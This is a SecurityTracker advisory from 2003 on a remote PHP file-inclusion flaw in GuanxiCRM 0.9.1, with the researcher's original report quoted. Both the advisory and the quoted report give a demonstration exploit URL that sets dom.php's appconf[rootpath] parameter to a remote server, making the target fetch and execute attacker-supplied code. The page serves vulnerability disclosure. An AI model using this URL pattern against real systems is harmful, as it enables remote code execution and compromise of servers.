SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   guanxiCRM Vendors:   guanxiCRM.com
GuanxiCRM Include File Holes Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1007254
SecurityTracker URL:  http://securitytracker.com/id/1007254
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 22 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.9.1
Description:   Phil Dunn reported a vulnerability in GuanxiCRM. A remote user can execute arbitrary PHP code, including operating system commands on the target system.

It is reported that several scripts do not properly validate user-specified variables. A remote user can specify a remote location for inclusion of certain PHP files to cause arbitrary PHP code to be executed on the target system.

According to the report, the following files may be affected: parser.php, dom.php, imap.php, rfc822.php, fetchmail.php, maillist.php, operations.php, class.html.mime.mail.class, and settings.php.

A demonstration exploit URL is provided:

http://[target]/[guanxicrm dir]/include/phpxd/include/dom.php?appconf[rootpath]=http://[remote server]

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.guanxicrm.com/modules/news/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  GuanxiCRM Remote Include Vulnderability



Name: Phil Dunn
Email: z3hp@yahoo.com
Date: July - 20 - 2003
Program: GuanxiCRM
Version: v0.9.1
Vendor Name: wjue
Vendor URL: http://www.guanxicrm.com/



Description:
Any user can execute arbitrary PHP code or
system commands with privileges of web server.
A user can easily include remote PHP files to
be parsed.


Vulnerable files:
parser.php, dom.php, imap.php, rfc822.php,
fetchmail.php,
maillist.php, operations.php,
class.html.mime.mail.class
and possibly settings.php



Exploit:
http://[server]/[guanxicrm
dir]/include/phpxd/include/dom.php?appconf[rootpath]=http://[remote
server]


__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC